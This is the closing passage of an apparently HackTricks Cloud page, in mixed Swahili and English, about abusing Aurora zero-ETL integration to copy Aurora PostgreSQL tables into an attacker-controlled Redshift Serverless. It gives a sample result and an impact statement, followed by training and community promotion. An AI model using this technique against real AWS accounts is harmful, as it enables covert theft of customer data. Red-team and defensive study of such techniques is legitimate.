- Baada ya CREATE DATABASE FROM INTEGRATION, listing tables ilibainisha schema ztl na table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).
Athari: Exfiltration ya karibuāwakati halisi ya jedwali zilizochaguliwa za Aurora PostgreSQL hadi Redshift Serverless zinazoendeshwa na mshambulizi, bila kutumia database credentials, backups, au network access kwa source cluster.
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HackTricks Cloud